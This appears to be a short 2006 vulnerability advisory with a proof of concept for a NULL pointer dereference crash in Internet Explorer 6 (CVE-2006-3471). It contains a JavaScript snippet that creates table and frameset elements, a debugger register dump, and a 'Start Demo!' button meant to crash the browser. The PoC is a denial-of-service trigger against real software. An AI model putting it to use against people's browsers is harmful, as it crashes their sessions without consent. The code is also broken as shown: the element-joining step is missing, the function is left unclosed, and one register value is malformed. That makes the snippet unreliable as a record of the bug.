Microsoft Internet Explorer 6 - Table.Frameset NULL Dereference

Related Vulnerabilities: CVE-2006-3471  
Publish Date: 07 Jul 2006
Author: Aviv Raff

The following bug was tested on the latest version of Internet Explorer 6 
on a fully-patched Windows XP SP2 system. This bug was found by Aviv Raff 
using the DOM-Hanoi fuzzer script. DOM-Hanoi works by building trees of 
every combination of elements up to the specifed depth. An alternate PoC 
could use plain HTML instead of javascript.

var a = document.createElement('table');
var b = document.createElement('frameset');

eax=00000000 ebx=01884710 ecx=01886c60
edx=00000027 esi=0013aeb0 edi=01884730
eip=7dc995ad esp=0013ae88 ebp=0013ae9c6
7dc995ad f60010 test byte ptr [eax],0x10 ds:0023:00000000=??



// MoBB Demonstration
function Demo() {
	var a = document.createElement('table');
	var b = document.createElement('frameset');

Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='Demo()' value='Start Demo!'>


# [2006-07-07]